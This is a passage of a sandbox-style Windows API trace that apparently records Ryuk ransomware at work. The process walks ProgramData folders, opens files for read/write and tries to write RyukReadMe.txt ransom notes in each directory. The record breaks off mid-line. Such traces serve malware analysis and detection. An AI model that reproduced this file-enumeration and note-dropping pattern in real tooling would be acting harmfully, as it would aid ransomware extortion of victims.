[0140.744] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", dwFileAttributes=0x80) returned 0 [0140.744] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.744] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.744] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.744] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.744] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", dwFileAttributes=0x80) returned 0 [0140.744] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.744] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.745] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.745] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.745] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", dwFileAttributes=0x80) returned 0 [0140.745] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.745] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.745] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.745] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.745] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.745] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", dwFileAttributes=0x80) returned 0 [0140.745] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.746] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.746] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.746] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.746] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.746] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", dwFileAttributes=0x80) returned 0 [0140.746] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.746] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.746] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.746] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.746] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.747] SetLastError (dwErrCode=0x0) [0140.747] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.750] GetLastError () returned 0x5 [0140.750] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.750] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.750] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.750] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp", dwFileAttributes=0x80) returned 0 [0140.750] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.750] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.750] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.750] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.750] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp", dwFileAttributes=0x80) returned 0 [0140.751] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.751] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.751] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.751] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.751] SetLastError (dwErrCode=0x0) [0140.751] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\user account pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.751] GetLastError () returned 0x5 [0140.751] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.751] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.751] SetLastError (dwErrCode=0x0) [0140.751] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.751] GetLastError () returned 0x5 [0140.751] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.751] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Vault\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.752] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.752] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.752] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.752] SetLastError (dwErrCode=0x0) [0140.752] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Vault\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\vault\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.752] GetLastError () returned 0x5 [0140.752] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.752] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.752] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.752] SetLastError (dwErrCode=0x0) [0140.752] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.752] GetLastError () returned 0x5 [0140.752] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.752] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.752] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\VISIO\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.753] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.753] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.753] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.753] SetLastError (dwErrCode=0x0) [0140.753] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\VISIO\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\visio\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.753] GetLastError () returned 0x5 [0140.753] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.754] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.754] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.754] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.754] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.754] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.754] SetLastError (dwErrCode=0x0) [0140.754] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.754] GetLastError () returned 0x5 [0140.754] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.754] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.754] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\WwanSvc\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.754] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.755] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.755] SetLastError (dwErrCode=0x0) [0140.755] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\WwanSvc\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\wwansvc\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.755] GetLastError () returned 0x5 [0140.755] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.755] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.755] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.755] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.755] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.755] SetLastError (dwErrCode=0x0) [0140.755] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.755] GetLastError () returned 0x5 [0140.755] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.755] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.756] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.756] SetLastError (dwErrCode=0x0) [0140.756] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\WwanSvc\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\wwansvc\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.756] GetLastError () returned 0x5 [0140.756] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.756] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0140.756] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0140.756] SetLastError (dwErrCode=0x0) [0140.756] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.756] GetLastError () returned 0x5 [0140.756] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0140.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.756] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.756] SetLastError (dwErrCode=0x0) [0140.756] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.756] GetLastError () returned 0xb7 [0140.757] CloseHandle (hObject=0x180) returned 1 [0140.757] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft Help\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0140.758] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.759] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.759] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.760] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\Hx.hxn", dwFileAttributes=0x80) returned 0 [0140.760] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.760] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.760] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.760] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.760] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.760] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.761] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.761] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.761] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.761] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.761] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.761] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.762] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.762] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.762] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.762] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.762] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.762] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.763] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.763] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.763] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.763] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.763] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.763] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.763] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.763] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.763] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.764] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.764] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.764] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.764] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.764] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.764] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.765] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.765] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.765] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.765] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.765] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.765] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.765] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.766] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.766] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.766] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.766] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.766] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.767] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.767] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.767] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.767] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.767] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.767] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.767] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.768] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), 